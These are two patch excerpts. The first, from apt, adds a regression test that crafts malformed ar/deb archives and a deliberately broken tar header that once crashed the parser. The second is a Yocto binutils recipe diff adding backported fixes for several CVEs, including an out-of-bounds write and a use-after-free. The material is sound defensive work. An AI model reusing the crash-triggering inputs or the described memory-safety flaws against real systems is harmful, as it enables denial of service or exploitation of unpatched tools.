++++ b/apt-inst/contrib/extracttar.cc
+@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
+
+ default:
+ BadRecord = true;
+- _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
++ _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
+ break;
+ }
+
+diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
+new file mode 100755
+index 000000000..ec2163bf6
+--- /dev/null
++++ b/test/integration/test-github-111-invalid-armember
+@@ -0,0 +1,88 @@
++#!/bin/sh
++set -e
++
++TESTDIR="$(readlink -f "$(dirname "$0")")"
++. "$TESTDIR/framework"
++setupenvironment
++configarchitecture "amd64"
++setupaptarchive
++
++# this used to crash, but it should treat it as an invalid member header
++touch ' '
++ar -q test.deb ' '
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++rm test.deb
++touch 'x'
++ar -q test.deb 'x'
++testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# <name><size> [ other fields] - name is not nul terminated here, it ends in .
++msgmsg "Unterminated ar member name"
++printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# unused source code for generating $tar below
++maketar() {
++ cat > maketar.c << EOF
++ #include <stdio.h>
++ #include <string.h>
++ struct tar {
++ char Name[100];
++ char Mode[8];
++ char UserID[8];
++ char GroupID[8];
++ char Size[12];
++ char MTime[12];
++ char Checksum[8];
++ char LinkFlag;
++ char LinkName[100];
++ char MagicNumber[8];
++ char UserName[32];
++ char GroupName[32];
++ char Major[8];
++ char Minor[8];
++ };
++
++ int main(void)
++ {
++ union {
++ struct tar t;
++ char buf[512];
++ } t;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ t.buf[i] = '7';
++ memcpy(t.t.Name, "unterminatedName", 16);
++ memcpy(t.t.UserName, "userName", 8);
++ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
++ t.t.LinkFlag = 'X'; // I AM BROKEN
++ memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
++ memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
++
++ unsigned long sum = 0;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ sum += t.buf[i];
++
++ int written = sprintf(t.t.Checksum, "%lo", sum);
++ for (int i = written; i < sizeof(t.t.Checksum); i++)
++ t.t.Checksum[i] = ' ';
++ fwrite(t.buf, sizeof(t.buf), 1, stdout);
++ }
++EOF
++
++ gcc maketar.c -o maketar -Wall
++ ./maketar
++}
++
++
++#
++tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
++printf '%s' "$tar" | gzip > control.tar.gz
++cp control.tar.gz data.tar.gz
++touch debian-binary
++rm test.deb
++ar -q test.deb debian-binary control.tar.gz data.tar.gz
++testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
+--
+GitLab
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index b5f5a1c69a..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
-SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440"
+SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
SRC_URI = "\
${BINUTILS_GIT_URI} \
@@ -42,7 +42,25 @@ SRC_URI = "\
file://0015-sync-with-OE-libtool-changes.patch \
file://0016-Check-for-clang-before-checking-gcc-version.patch \
file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
+ file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
file://CVE-2020-0551.patch \
file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
+ file://CVE-2020-16592.patch \
+ file://CVE-2020-16598.patch \
+ file://CVE-2021-20197.patch \
+ file://CVE-2021-3487.patch \
+ file://CVE-2021-3549.patch \
+ file://CVE-2020-16593.patch \
+ file://0001-CVE-2021-45078.patch \
+ file://CVE-2022-38533.patch \
+ file://CVE-2023-25588.patch \
+ file://CVE-2021-46174.patch \
+ file://CVE-2023-25584.patch \
+ file://CVE-2022-47007.patch \
+ file://CVE-2022-47008.patch \
+ file://CVE-2022-47010.patch \
+ file://CVE-2022-47011.patch \
+ file://CVE-2022-48063.patch \
+ file://CVE-2022-47695.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
+From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Dec 2021 11:48:42 +1030
+Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
+
+ PR 28694
+ * stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
+ Negate typenum earlier, simplifying bounds checking. Correct
+ off-by-one indexing. Adjust switch cases.
+
+
+CVE: CVE-2021-45078
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
+
+Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
+ 1 file changed, 43 insertions(+), 44 deletions(-)
+
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 274bfb0e7fa..83ee3ea5fa4 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
+ static bfd_boolean stab_record_type
+ (void *, struct stab_handle *, const int *, debug_type);
+ static debug_type stab_xcoff_builtin_type
+- (void *, struct stab_handle *, int);
++ (void *, struct stab_handle *, unsigned int);
+ static debug_type stab_find_tagged_type
+ (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
+ static debug_type *stab_demangle_argtypes
+@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
+
+ static debug_type
+ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+- int typenum)
++ unsigned int typenum)
+ {
+ debug_type rettype;
+ const char *name;
+
+- if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
++ typenum = -typenum - 1;
++ if (typenum >= XCOFF_TYPE_COUNT)
+ {
+- fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
++ fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
+ return DEBUG_TYPE_NULL;
+ }
+- if (info->xcoff_types[-typenum] != NULL)
+- return info->xcoff_types[-typenum];
++ if (info->xcoff_types[typenum] != NULL)
++ return info->xcoff_types[typenum];
+
+- switch (-typenum)
++ switch (typenum)
+ {
+- case 1:
++ case 0:
+ /* The size of this and all the other types are fixed, defined
+ by the debugging format. */
+ name = "int";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 2:
++ case 1:
+ name = "char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 3:
++ case 2:
+ name = "short";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 4:
++ case 3:
+ name = "long";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 5:
++ case 4:
+ name = "unsigned char";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 6:
++ case 5:
+ name = "signed char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 7:
++ case 6:
+ name = "unsigned short";
+ rettype = debug_make_int_type (dhandle, 2, TRUE);
+ break;
+- case 8:
++ case 7:
+ name = "unsigned int";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 9:
++ case 8:
+ name = "unsigned";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 10:
++ case 9:
+ name = "unsigned long";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 11:
++ case 10:
+ name = "void";
+ rettype = debug_make_void_type (dhandle);
+ break;
+- case 12:
++ case 11:
+ /* IEEE single precision (32 bit). */
+ name = "float";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 13:
++ case 12:
+ /* IEEE double precision (64 bit). */
+ name = "double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 14:
++ case 13:
+ /* This is an IEEE double on the RS/6000, and different machines
+ with different sizes for "long double" should use different
+ negative type numbers. See stabs.texinfo. */
+ name = "long double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 15:
++ case 14:
+ name = "integer";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 16:
++ case 15:
+ name = "boolean";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 17:
++ case 16:
+ name = "short real";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 18:
++ case 17:
+ name = "real";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 19:
++ case 18:
+ /* FIXME */
+ name = "stringptr";
+ rettype = NULL;
+ break;
+- case 20:
++ case 19:
+ /* FIXME */
+ name = "character";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 21:
++ case 20:
+ name = "logical*1";
+ rettype = debug_make_bool_type (dhandle, 1);
+ break;
+- case 22:
++ case 21:
+ name = "logical*2";
+ rettype = debug_make_bool_type (dhandle, 2);
+ break;
+- case 23:
++ case 22:
+ name = "logical*4";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 24:
++ case 23:
+ name = "logical";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 25:
++ case 24:
+ /* Complex type consisting of two IEEE single precision values. */
+ name = "complex";
+ rettype = debug_make_complex_type (dhandle, 8);
+ break;
+- case 26:
++ case 25:
+ /* Complex type consisting of two IEEE double precision values. */
+ name = "double complex";
+ rettype = debug_make_complex_type (dhandle, 16);
+ break;
+- case 27:
++ case 26:
+ name = "integer*1";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 28:
++ case 27:
+ name = "integer*2";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 29:
++ case 28:
+ name = "integer*4";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 30:
++ case 29:
+ /* FIXME */
+ name = "wchar";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 31:
++ case 30:
+ name = "long long";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+- case 32:
++ case 31:
+ name = "unsigned long long";
+ rettype = debug_make_int_type (dhandle, 8, TRUE);
+ break;
+- case 33:
++ case 32:
+ name = "logical*8";
+ rettype = debug_make_bool_type (dhandle, 8);
+ break;
+- case 34:
++ case 33:
+ name = "integer*8";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+ }
+
+ rettype = debug_name_type (dhandle, name, rettype);
+-
+- info->xcoff_types[-typenum] = rettype;
+-
++ info->xcoff_types[typenum] = rettype;
+ return rettype;
+ }
+
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
-From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001
+From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
From: Khem Raj <raj.khem@gmail.com>
Date: Fri, 15 Jan 2016 06:31:09 +0000
Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
ld/ldfile.c | 17 +++++++++++++++++
ld/ldlex.h | 2 ++
ld/ldmain.c | 2 ++
- ld/lexsup.c | 15 +++++++++++++++
- 9 files changed, 85 insertions(+)
+ ld/lexsup.c | 16 ++++++++++++++++
+ 9 files changed, 86 insertions(+)
diff --git a/ld/config.in b/ld/config.in
index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
#undef EXTRA_SHLIB_EXTENSION
diff --git a/ld/configure b/ld/configure
-index 811134a503..f8c17c19ae 100755
+index f432f4637d..a9da3c115e 100755
--- a/ld/configure
+++ b/ld/configure
-@@ -826,6 +826,7 @@ with_lib_path
+@@ -830,6 +830,7 @@ with_lib_path
enable_targets
enable_64_bit_bfd
with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
enable_gold
enable_got
enable_compressed_debug_sections
-@@ -1491,6 +1492,8 @@ Optional Features:
+@@ -1495,6 +1496,8 @@ Optional Features:
--disable-largefile omit support for large files
--enable-targets alternative target configurations
--enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
--enable-gold[=ARG] build gold [ARG={default,yes,no}]
--enable-got=<type> GOT handling scheme (target, single, negative,
multigot)
-@@ -15788,6 +15791,19 @@ fi
+@@ -16624,6 +16627,19 @@ fi
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
/* The initial parser states. */
diff --git a/ld/ldmain.c b/ld/ldmain.c
-index da1ad17763..12d0b07d8a 100644
+index c4af10f4e9..95b56b2d2d 100644
--- a/ld/ldmain.c
+++ b/ld/ldmain.c
-@@ -274,6 +274,8 @@ main (int argc, char **argv)
+@@ -273,6 +273,8 @@ main (int argc, char **argv)
command_line.warn_mismatch = TRUE;
command_line.warn_search_mismatch = TRUE;
command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
/* We initialize DEMANGLING based on the environment variable
COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the
diff --git a/ld/lexsup.c b/ld/lexsup.c
-index 3d15cc491d..0e8b4f2b7a 100644
+index 3d15cc491d..6478821443 100644
--- a/ld/lexsup.c
+++ b/ld/lexsup.c
@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
};
#define OPTION_COUNT ARRAY_SIZE (ld_options)
-@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv)
-
+@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
case OPTION_PRINT_MAP_DISCARDED:
config.print_map_discarded = TRUE;
+ break;
+
+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
+ command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
+
+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
+ command_line.error_poison_system_directories = TRUE;
- break;
++ break;
}
}
diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
+From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Sat, 29 Aug 2020 08:03:15 +0100
+Subject: [PATCH] Include members in the variable table used when resolving
+ DW_AT_specification tags.
+
+ PR 26520
+ * dwarf2.c (scan_unit_for_symbols): Add member entries to the
+ variable table.
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
+---
+ bfd/dwarf2.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index dd3568a8532..ef2f6a3c63c 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
+ else
+ {
+ func = NULL;
+- if (abbrev->tag == DW_TAG_variable)
++ if (abbrev->tag == DW_TAG_variable
++ || abbrev->tag == DW_TAG_member)
+ {
+ bfd_size_type amt = sizeof (struct varinfo);
+ var = (struct varinfo *) bfd_zalloc (abfd, amt);
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
new file mode 100644
index 0000000000..f5f9ccdd53
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
@@ -0,0 +1,61 @@
+From 7ecb51549ab1ec22aba5aaf34b70323cf0b8509a Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Apr 2020 18:58:11 +0930
+Subject: [PATCH] PR25823, Use after free in bfd_hash_lookup
+
+ PR 25823
+ * peXXigen.c (_bfd_XXi_swap_sym_in <C_SECTION>): Don't use a
+ pointer into strings that may be freed for section name, always
+ allocate a new string.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=7ecb51549ab1ec22aba5aaf34b70323cf0b8509a]
+CVE: CVE-2020-16592
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/peXXigen.c | 20 ++++++++++----------
+ 1 files changed, 10 insertions(+), 10 deletions(-)
+
+diff --git a/bfd/peXXigen.c b/bfd/peXXigen.c
+index b9eeb775d9b..8aa5914acd9 100644
+--- a/bfd/peXXigen.c
++++ b/bfd/peXXigen.c
+@@ -177,25 +177,25 @@ _bfd_XXi_swap_sym_in (bfd * abfd, void * ext1, void * in1)
+ int unused_section_number = 0;
+ asection *sec;
+ flagword flags;
++ size_t name_len;
++ char *sec_name;
+
+ for (sec = abfd->sections; sec; sec = sec->next)
+ if (unused_section_number <= sec->target_index)
+ unused_section_number = sec->target_index + 1;
+
+- if (name == namebuf)
++ name_len = strlen (name) + 1;
++ sec_name = bfd_alloc (abfd, name_len);
++ if (sec_name == NULL)
+ {
+- name = (const char *) bfd_alloc (abfd, strlen (namebuf) + 1);
+- if (name == NULL)
+- {
+- _bfd_error_handler (_("%pB: out of memory creating name for empty section"),
+- abfd);
+- return;
+- }
+- strcpy ((char *) name, namebuf);
++ _bfd_error_handler (_("%pB: out of memory creating name "
++ "for empty section"), abfd);
++ return;
+ }
++ memcpy (sec_name, name, name_len);
+
+ flags = SEC_HAS_CONTENTS | SEC_ALLOC | SEC_DATA | SEC_LOAD;
+- sec = bfd_make_section_anyway_with_flags (abfd, name, flags);
++ sec = bfd_make_section_anyway_with_flags (abfd, sec_name, flags);
+ if (sec == NULL)
+ {
+ _bfd_error_handler (_("%pB: unable to create fake empty section"),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
+From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 16 Apr 2020 17:49:38 +0930
+Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
+
+ PR 25827
+ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
+ strdup(0).
+
+Upstream-Status: Backport
+https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
+CVE: CVE-2020-16593
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: git/bfd/dwarf2.c
+===================================================================
+--- git.orig/bfd/dwarf2.c
++++ git/bfd/dwarf2.c
+@@ -295,12 +295,12 @@ struct comp_unit
+ /* This data structure holds the information of an abbrev. */
+ struct abbrev_info
+ {
+- unsigned int number; /* Number identifying abbrev. */
+- enum dwarf_tag tag; /* DWARF tag. */
+- int has_children; /* Boolean. */
+- unsigned int num_attrs; /* Number of attributes. */
+- struct attr_abbrev *attrs; /* An array of attribute descriptions. */
+- struct abbrev_info *next; /* Next in chain. */
++ unsigned int number; /* Number identifying abbrev. */
++ enum dwarf_tag tag; /* DWARF tag. */
++ bfd_boolean has_children; /* TRUE if the abbrev has children. */
++ unsigned int num_attrs; /* Number of attributes. */
++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */
++ struct abbrev_info * next; /* Next in chain. */
+ };
+
+ struct attr_abbrev
+@@ -1487,6 +1487,8 @@ struct varinfo
+ {
+ /* Pointer to previous variable in list of all variables */
+ struct varinfo *prev_var;
++ /* The offset of the varinfo from the start of the unit. */
++ bfd_uint64_t unit_offset;
+ /* Source location file name */
+ char *file;
+ /* Source location line number */
+@@ -1497,7 +1499,7 @@ struct varinfo
+ /* Where the symbol is defined */
+ asection *sec;
+ /* Is this a stack variable? */
+- unsigned int stack: 1;
++ bfd_boolean stack;
+ };
+
+ /* Return TRUE if NEW_LINE should sort after LINE. */
+@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
+ struct varinfo* each;
+
+ for (each = unit->variable_table; each; each = each->prev_var)
+- if (each->stack == 0
++ if (! each->stack
+ && each->file != NULL
+ && each->name != NULL
+ && each->addr == addr
+@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
+ return TRUE;
+ }
+
++static struct varinfo *
++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
++{
++ while (table)
++ {
++ if (table->unit_offset == offset)
++ return table;
++ table = table->prev_var;
++ }
++
++ return NULL;
++}
++
++
+ /* DWARF2 Compilation unit functions. */
+
+ /* Scan over each die in a comp. unit looking for functions to add
+@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
+ bfd_vma low_pc = 0;
+ bfd_vma high_pc = 0;
+ bfd_boolean high_pc_relative = FALSE;
++ bfd_uint64_t current_offset;
++
++ current_offset = info_ptr - unit->info_ptr_unit;
+
+ /* PR 17512: file: 9f405d9d. */
+ if (info_ptr >= info_ptr_end)
+@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
+ goto fail;
+ }
+
+- var = NULL;
+ if (abbrev->tag == DW_TAG_subprogram
+ || abbrev->tag == DW_TAG_entry_point
+ || abbrev->tag == DW_TAG_inlined_subroutine)
+ {
+ bfd_size_type amt = sizeof (struct funcinfo);
++
++ var = NULL;
+ func = (struct funcinfo *) bfd_zalloc (abfd, amt);
+ if (func == NULL)
+ goto fail;
+@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
+ if (var == NULL)
+ goto fail;
+ var->tag = abbrev->tag;
+- var->stack = 1;
++ var->stack = TRUE;
+ var->prev_var = unit->variable_table;
+ unit->variable_table = var;
++ var->unit_offset = current_offset;
+ /* PR 18205: Missing debug information can cause this
+ var to be attached to an already cached unit. */
+ }
+-
++ else
++ var = NULL;
+ /* No inline function in scope at this nesting level. */
+ nested_funcs[nesting_level].func = 0;
+ }
+@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
+ {
+ switch (attr.name)
+ {
++ case DW_AT_specification:
++ if (attr.u.val)
++ {
++ struct varinfo * spec_var;
++
++ spec_var = lookup_var_by_offset (attr.u.val,
++ unit->variable_table);
++ if (spec_var == NULL)
++ {
++ _bfd_error_handler (_("DWARF error: could not find "
++ "variable specification "
++ "at offset %lx"),
++ (unsigned long) attr.u.val);
++ break;
++ }
++
++ if (var->name == NULL)
++ var->name = spec_var->name;
++ if (var->file == NULL && spec_var->file != NULL)
++ var->file = strdup (spec_var->file);
++ if (var->line == 0)
++ var->line = spec_var->line;
++ if (var->sec == NULL)
++ var->sec = spec_var->sec;
++ }
++ break;
++
+ case DW_AT_name:
+ if (is_str_attr (attr.form))
+ var->name = attr.u.str;
+@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
+
+ case DW_AT_external:
+ if (attr.u.val != 0)
+- var->stack = 0;
++ var->stack = FALSE;
+ break;
+
+ case DW_AT_location:
+@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
+ if (attr.u.blk->data != NULL
+ && *attr.u.blk->data == DW_OP_addr)
+ {
+- var->stack = 0;
++ var->stack = FALSE;
+
+ /* Verify that DW_OP_addr is the only opcode in the
+ location, in which case the block size will be 1
+@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
+ each_var = each_var->prev_var)
+ {
+ /* Skip stack vars and vars with no files or names. */
+- if (each_var->stack == 0
++ if (! each_var->stack
+ && each_var->file != NULL
+ && each_var->name != NULL)
+ /* There is no need to copy name string into hash table as
+Index: git/bfd/ChangeLog
+===================================================================
+--- git.orig/bfd/ChangeLog
++++ git/bfd/ChangeLog
+@@ -1,3 +1,9 @@
++2020-04-16 Alan Modra <amodra@gmail.com>
++
++ PR 25827
++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
++ strdup(0).
++
+ 2021-05-03 Alan Modra <amodra@gmail.com>
+
+ PR 27755
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
new file mode 100644
index 0000000000..52bd925c97
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
@@ -0,0 +1,32 @@
+From ca3f923f82a079dcf441419f4a50a50f8b4b33c2 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Apr 2020 10:38:16 +0930
+Subject: [PATCH] PR25840, Null pointer dereference in objdump
+
+ PR 25840
+ * debug.c (debug_class_type_samep): Don't segfault on NULL type.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=ca3f923f82a079dcf441419f4a50a50f8b4b33c2]
+CVE: CVE-2020-16598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ binutils/debug.c | 2 ++
+ 1 files changed, 2 insertions(+)
+
+diff --git a/binutils/debug.c b/binutils/debug.c
+index 022fa4edffb..5470e155edc 100644
+--- a/binutils/debug.c
++++ b/binutils/debug.c
+@@ -3277,6 +3277,8 @@ debug_class_type_samep (struct debug_handle *info, struct debug_type_s *t1,
+ names, since that sometimes fails in the presence of
+ typedefs and we really don't care. */
+ if (strcmp (f1->name, f2->name) != 0
++ || f1->type == NULL
++ || f2->type == NULL
+ || ! debug_type_samep (info,
+ debug_get_real_type ((void *) info,
+ f1->type, NULL),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
+From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 26 Feb 2021 11:30:32 +1030
+Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
+
+In the interests of a stable release various last minute smart_rename
+patches were backed out of the 2.36 branch. The main reason to
+reinstate some of those backed out changes here is to make necessary
+followup fixes to commit 8e03235147a9 simple cherry-picks from
+mainline. A secondary reason is that ar -M support isn't fixed for
+pr26945 without this patch.
+
+ PR 26945
+ * ar.c: Don't include libbfd.h.
+ (write_archive): Replace xmalloc+strcpy with xstrdup.
+ * arsup.c (temp_name, real_ofd): New static variables.
+ (ar_open): Use make_tempname and bfd_fdopenw.
+ (ar_save): Adjust to suit ar_open changes.
+ * objcopy.c: Don't include libbfd.h.
+ * rename.c: Rename and reorder variables.
+
+(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
+
